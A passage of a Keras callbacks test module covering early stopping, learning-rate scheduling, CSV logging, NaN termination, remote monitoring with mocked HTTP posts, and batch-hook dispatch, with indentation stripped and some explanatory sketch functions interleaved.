y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
# This should allow training to go on for at least `patience` epochs.
model.set_weights(weights)
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.6
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = testing_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['acc'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 2
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel:
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
# The best configuration is at epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is at epoch 2 (loss = 0.1000). Although patience = 2,
# we are restoring the best weights, so the model ends up with the weights
# from the best epoch, i.e. epoch 2.
self.assertEqual(early_stop.model.get_weights(), 2)
# Check early stopping when no model beats the baseline.
early_stop = keras.callbacks.EarlyStopping(
monitor='val_loss', patience=5, baseline=0.5, restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.9, 0.8, 0.7, 0.71, 0.72, 0.73]
# The best configuration is at epoch 2 (loss = 0.7000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# No epoch improves on the baseline, so training should stop after only
# 5 epochs and restore the weights from epoch 2, the lowest observed loss.
self.assertEqual(epochs_trained, 5)
self.assertEqual(early_stop.model.get_weights(), 2)
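# Illustrative sketch (not part of the test above): `restore_best_weights`
# copies back the weights of the best-monitored epoch when training stops, and
# `baseline` requires the monitored metric to beat a threshold within
# `patience` epochs. The import style and the random data are assumptions for
# this sketch only.
def _early_stopping_sketch():
  import numpy as np
  from tensorflow import keras
  model = keras.Sequential([keras.layers.Dense(1, input_shape=(4,))])
  model.compile('sgd', 'mse')
  x, y = np.random.random((32, 4)), np.random.random((32, 1))
  stopper = keras.callbacks.EarlyStopping(
      monitor='val_loss',
      patience=2,                  # stop after 2 epochs without improvement
      baseline=0.5,                # val_loss must beat 0.5 within `patience`
      restore_best_weights=True)   # roll back to the best epoch's weights
  return model.fit(x, y, validation_split=0.25, epochs=20,
                   callbacks=[stopper], verbose=0)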
def test_RemoteMonitor(self):
if requests is None:
self.skipTest('`requests` required to run this test')
return None
monitor = keras.callbacks.RemoteMonitor()
# This will raise a warning since the default address is unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [
keras.callbacks.LearningRateScheduler(
lambda x: 1. / (1. + x), verbose=1)
]
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5)
self.assertIn('LearningRateScheduler setting learning rate to 1.0',
printed.contents())
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
cbks = [
keras.callbacks.LearningRateScheduler(
lambda epoch, _: learning_rate_schedule.CosineDecay(0.01, 2)
(epoch))
]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
cosine_decay_np = 0.5 * (1 + np.cos(np.pi * (1 / 2)))
decayed_learning_rate = 0.01 * cosine_decay_np
assert (float(keras.backend.get_value(model.optimizer.lr)) -
decayed_learning_rate) < keras.backend.epsilon()
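# Illustrative sketch (not part of the test above): a `LearningRateScheduler`
# schedule may take either `(epoch)` or `(epoch, lr)` and returns the learning
# rate to use for that epoch. The halving schedule below is an example, not
# drawn from this test module; a compiled `model` and data are assumed.
def _lr_scheduler_sketch(model, x, y):
  from tensorflow import keras
  def halve_after_first_epoch(epoch, lr):
    # Keep the initial rate for epoch 0, then halve it every epoch after.
    return lr if epoch == 0 else lr * 0.5
  cb = keras.callbacks.LearningRateScheduler(halve_after_first_epoch, verbose=1)
  model.fit(x, y, epochs=3, callbacks=[cb], verbose=0)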
def test_ReduceLROnPlateau(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
tf.compat.v1.set_random_seed(1234)
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=gradient_descent.SGD(lr=0.1))
return model
# TODO(psv): Make sure the callback works correctly when min_delta is
# set as 0. Test fails when the order of this callback and assertion is
# interchanged.
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
model = make_model()
# This should reduce the LR after the first epoch (due to the large min_delta).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer:
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel:
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rate should stay at 1.0 for all but the last epoch.
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegex(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
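# Illustrative sketch (not part of the tests above): `ReduceLROnPlateau`
# multiplies the learning rate by `factor` once the monitored metric has not
# improved by at least `min_delta` for `patience` epochs; `cooldown` then
# suppresses further reductions for a few epochs. The parameter values below
# are examples only, and a compiled `model` with data is assumed.
def _reduce_lr_on_plateau_sketch(model, x, y):
  from tensorflow import keras
  cb = keras.callbacks.ReduceLROnPlateau(
      monitor='val_loss',
      factor=0.1,      # new_lr = lr * 0.1 on a plateau
      patience=3,      # epochs with no improvement before reducing
      min_delta=1e-4,  # smallest change that counts as an improvement
      cooldown=2,      # epochs to wait after a reduction
      min_lr=1e-6)     # never go below this learning rate
  model.fit(x, y, validation_split=0.2, epochs=20, callbacks=[cb], verbose=0)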
def test_CSVLogger(self):
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=gradient_descent.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = ' '.join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
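# Illustrative sketch (not part of the test above): `CSVLogger` streams the
# per-epoch logs to a delimited file, and `append=True` lets several fit()
# calls share one file, which is what cases 2 and 3 above rely on. The path,
# the import style, and the compiled `model` with data are assumptions for
# this sketch only.
def _csv_logger_sketch(model, x, y, log_path='/tmp/training_log.csv'):
  from tensorflow import keras
  logger = keras.callbacks.CSVLogger(log_path, separator=',', append=True)
  model.fit(x, y, epochs=2, callbacks=[logger], verbose=0)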
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while True:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in csv.reader(f):
# On Windows, \r\n line endings can cause an empty line to be read after
# each row. Skip those empty lines.
if x:
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_TerminateOnNaN(self):
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
self.assertEqual(len(loss), 1)
self.assertTrue(np.isnan(loss[0]) or np.isinf(loss[0]))
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary thread that should run during model
# training and be signalled to terminate after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_RemoteMonitor_np_array(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with tf.compat.v1.test.mock.patch.object(requests, 'post') as requests_post:
monitor = keras.callbacks.RemoteMonitor(send_as_json=True)
a = np.arange(1)  # a length-1 numpy array
logs = {'loss': 0., 'val': a}
monitor.on_epoch_end(0, logs=logs)
send = {'loss': 0., 'epoch': 0, 'val': 0}
requests_post.assert_called_once_with(
monitor.root + monitor.path, json=send, headers=monitor.headers)
def test_RemoteMonitor_np_float32(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with tf.compat.v1.test.mock.patch.object(requests, 'post') as requests_post:
monitor = keras.callbacks.RemoteMonitor(send_as_json=True)
a = np.float32(1.0) # a float32 generic type
logs = {'loss': 0., 'val': a}
monitor.on_epoch_end(0, logs=logs)
send = {'loss': 0., 'epoch': 0, 'val': 1.0}
requests_post.assert_called_once_with(
monitor.root + monitor.path, json=send, headers=monitor.headers)
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
return None
with self.cached_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with tf.compat.v1.test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
def test_progbar_infers_steps(self):
x, y = np.ones((10, 1)), np.ones((10, 1))
data = tf.data.Dataset.from_tensor_slices((x, y)).batch(2)
data = data.filter(lambda x, y: True) # Unknown cardinality.
progbar = keras.callbacks.ProgbarLogger('steps')
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
self.assertIsNone(progbar.target)
model.fit(data, epochs=2, callbacks=[progbar])
self.assertEqual(progbar.target, 5)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_callback_passed_floats(self):
class MyCallback(keras.callbacks.Callback):
def on_batch_end(self, batch, logs=None):
assert isinstance(batch, int)
assert isinstance(logs['loss'], float)
self.on_batch_end_called = True
def on_epoch_end(self, batch, logs=None):
assert isinstance(batch, int)
assert isinstance(logs['loss'], float)
self.on_epoch_end_called = True
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
callback = MyCallback()
model.fit(x, y, epochs=2, callbacks=[callback])
self.assertTrue(callback.on_batch_end_called)
self.assertTrue(callback.on_epoch_end_called)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_implements_batch_hooks(self):
class MyCallbackWithBatchHooks(keras.callbacks.Callback):
def __init__(self):
self.train_batches = 0
self.test_batches = 0
self.predict_batches = 0
def on_train_batch_end(self, batch, logs=None):
self.train_batches += 1
def on_test_batch_end(self, batch, logs=None):
self.test_batches += 1
def on_predict_batch_end(self, batch, logs=None):
self.predict_batches += 1
class MyCallbackWithTFBatchHooks(keras.callbacks.Callback):
def __init__(self):
super(MyCallbackWithTFBatchHooks, self).__init__()
self._supports_tf_logs = True
class MyCallbackWithoutBatchHooks(keras.callbacks.Callback):
def __init__(self):
self.epochs = 0
def on_epoch_end(self, epoch, logs=None):
self.epochs += 1
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
my_cb = MyCallbackWithBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._should_call_train_batch_hooks)
self.assertTrue(cb_list._should_call_test_batch_hooks)
self.assertTrue(cb_list._should_call_predict_batch_hooks)
self.assertFalse(cb_list._batch_hooks_support_tf_logs)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 2)
self.assertEqual(my_cb.test_batches, 1)
self.assertEqual(my_cb.predict_batches, 1)
my_cb = MyCallbackWithTFBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._batch_hooks_support_tf_logs)
my_cb = MyCallbackWithoutBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertLen(cb_list.callbacks, 1)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_logs_conversion(self):
assert_dict_equal = self.assertDictEqual
class MutateNumpyLogs(CallAllHooks):
def _run(self, *args, logs=None):
logs = logs or args[-1]
logs['numpy'] = 1
class MutateTensorFlowLogs(CallAllHooks):
def __init__(self):
super(MutateTensorFlowLogs, self).__init__()
self._supports_tf_logs = True
def _run(self, *args, logs=None):
logs = logs or args[-1]
logs['tf'] = 2
class AssertNumpyLogs(CallAllHooks):
def _run(self, *args, logs=None):
logs = logs or args[-1]
assert_dict_equal(logs, {'all': 0, 'numpy': 1, 'tf': 2})
class AssertTensorFlowLogs(AssertNumpyLogs):
def __init__(self):
super(AssertTensorFlowLogs, self).__init__()
self._supports_tf_logs = True
cb_list = keras.callbacks.CallbackList([
MutateNumpyLogs(),
MutateTensorFlowLogs(),
AssertNumpyLogs(),
AssertTensorFlowLogs()
])
assert len(cb_list.callbacks) == 4
cb_list.on_epoch_begin(0, logs={'all': 0})
cb_list.on_epoch_end(0, logs={'all': 0})
cb_list.on_predict_batch_begin(0, logs={'all': 0})
cb_list.on_predict_batch_end(0, logs={'all': 0})
cb_list.on_predict_begin(logs={'all': 0})
cb_list.on_predict_end(logs={'all': 0})
cb_list.on_test_batch_begin(0, logs={'all': 0})
cb_list.on_test_batch_end(0, logs={'all': 0})
cb_list.on_test_begin(logs={'all': 0})
cb_list.on_test_end(logs={'all': 0})
cb_list.on_train_batch_begin(0, logs={'all': 0})
cb_list.on_train_batch_end(0, logs={'all': 0})
cb_list.on_train_begin(logs={'all': 0})
cb_list.on_train_end(logs={'all': 0})
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_implements_batch_hooks_override(self):
class MyCallback(keras.callbacks.Callback):
def __init__(self, should_run=True):
self.should_run = should_run
self.train_batches = 0
self.test_batches = 0
self.predict_batches = 0
def on_train_batch_end(self, batch, logs=None):
self.train_batches += 1
def on_test_batch_end(self, batch, logs=None):
self.test_batches += 1
def on_predict_batch_end(self, batch, logs=None):
self.predict_batches += 1
def _implements_train_batch_hooks(self):
return self.should_run
def _implements_test_batch_hooks(self):
return self.should_run
def _implements_predict_batch_hooks(self):
return self.should_run
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
my_cb = MyCallback(should_run=True)
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._should_call_train_batch_hooks)
self.assertTrue(cb_list._should_call_test_batch_hooks)
self.assertTrue(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 2)
self.assertEqual(my_cb.test_batches, 1)
self.assertEqual(my_cb.predict_batches, 1)
my_cb = MyCallback(should_run=False)
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 0)
self.assertEqual(my_cb.test_batches, 0)
self.assertEqual(my_cb.predict_batches, 0)
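# Illustrative sketch (not part of the test above): overriding the private
# `_implements_*_batch_hooks` methods, as exercised above, lets a callback tell
# `CallbackList` to skip its per-batch dispatch entirely, avoiding per-batch
# Python overhead for callbacks that only care about epochs. This relies on a
# private Keras API and is shown only as a sketch.
def _epoch_only_callback_sketch():
  from tensorflow import keras
  class EpochOnlyCallback(keras.callbacks.Callback):
    def on_epoch_end(self, epoch, logs=None):
      print('epoch', epoch, 'loss', (logs or {}).get('loss'))
    def _implements_train_batch_hooks(self):
      return False  # CallbackList skips train batch hooks for this callback
    def _implements_test_batch_hooks(self):
      return False
    def _implements_predict_batch_hooks(self):
      return False
  return EpochOnlyCallback()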
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_default_callbacks_do_not_call_batch_hooks(self):
model = keras.Sequential([keras.layers.Dense(1)])
log_dir = self.get_temp_dir()
cb_list = keras.callbacks.CallbackList([
keras.callbacks.TensorBoard(log_dir, profile_batch=0),
keras.callbacks.ModelCheckpoint(log_dir),
],
add_progbar=True,
model=model,
verbose=2,
epochs=3)
self.assertLen(cb_list.callbacks, 3)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_change_tf_functions_during_fit(self):
class ChangeFunctions(keras.callbacks.Callback):
def on_epoch_end(self, epochs, logs=None):
def new_fn(iterator):
raise ValueError('New function substituted successfully.')
self.model.train_function = new_fn
self.model.test_function = new_fn
self.model.predict_function = new_fn
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
x, y = np.ones((10, 10)), np.ones((10, 1))
with self.assertRaisesRegex(ValueError, 'New function '):
model.fit(x, y, batch_size=2, epochs=2, callbacks=[ChangeFunctions()])
with self.assertRaisesRegex(ValueError, 'New function '):
model.evaluate(x, y, batch_size=2)
with self.assertRaisesRegex(ValueError, 'New function '):
model.predict(x, batch_size=2)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_stop_training_batch_level(self):
class MyCallback(keras.callbacks.Callback):
def __init__(self):
super(MyCallback, self).__init__()
self.batch_counter = 0
def on_train_batch_end(self, batch, logs=None):
self.batch_counter += 1
if batch == 2:
self.model.stop_training = True
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
x, y = np.ones((10, 10)), np.ones((10, 1))
my_cb = MyCallback()
# Will run 5 batches if `stop_training` doesn't work.
model.fit(x, y, batch_size=2, callbacks=[my_cb])
self.assertEqual(my_cb.batch_counter, 3)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_built_in_callback_order(self):
class CustomCallback(keras.callbacks.Callback):
pass
class TestingCallbackList(keras.callbacks.CallbackList):
def __init__(self, *args, **kwargs):
super(TestingCallbackList, self).__init__(*args, **kwargs)
if ((not isinstance(self.callbacks[0], CustomCallback)) or
(not isinstance(self.callbacks[1], keras.callbacks.History)) or
(not isinstance(self.callbacks[2], keras.callbacks.ProgbarLogger))):
raise AssertionError(f'Callback order unexpected: {self.callbacks}')
with mock.patch.object(
keras.callbacks, 'CallbackList', TestingCallbackList):
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
custom_callback = CustomCallback()
model.fit(np.ones((10, 10)), np.ones((10, 1)), epochs=5,
callbacks=[custom_callback])
# A summary that was emitted during a test. Fields:
# logdir: str. The logdir of the FileWriter to which the summary was
# written.
# tag: str. The name of the summary.
_ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag'))
class _SummaryFile:
"""A record of summary tags and the files to which they were written.
Fields `scalars`, `images`, `histograms`, and `tensors` are sets
containing `_ObservedSummary` values.
"""
def __init__(self):
self.scalars = set()
self.images = set()
self.histograms = set()
self.tensors = set()
self.graph_defs = []
self.convert_from_v2_summary_proto = False
def list_summaries(logdir):
"""Read all summaries under the logdir into a `_SummaryFile`.
Args:
logdir: A path to a directory that contains zero or more event
files, either as direct children or in transitive subdirectories.
